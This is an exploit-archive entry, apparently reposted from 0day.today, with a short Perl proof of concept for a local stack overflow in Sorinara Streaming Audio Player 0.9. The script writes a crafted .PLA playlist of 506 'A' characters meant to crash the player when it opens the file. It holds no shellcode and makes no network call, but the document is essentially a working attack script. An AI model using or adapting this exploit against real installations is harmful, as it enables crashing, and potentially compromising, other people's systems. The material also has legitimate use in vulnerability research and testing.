id: 6858
date: 05/06/2009
title: Sorinara Streaming Audio Player 0.9 (.PLA) Local Stack Overflow PoC
author: GoLd_M
cves: 

===================================================================
Sorinara Streaming Audio Player 0.9 (.PLA) Local Stack Overflow PoC
===================================================================


# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ### # ## ## ## ###
# #  Sorinara Streaming Audio Player 0.9 (.PLA) Local Stack Overflow PoC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### # ### ## ## ###
my $chars= "A" x 506;
my $file="GOLD-M.PLA";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";



#  0day.today [2023-03-21]  #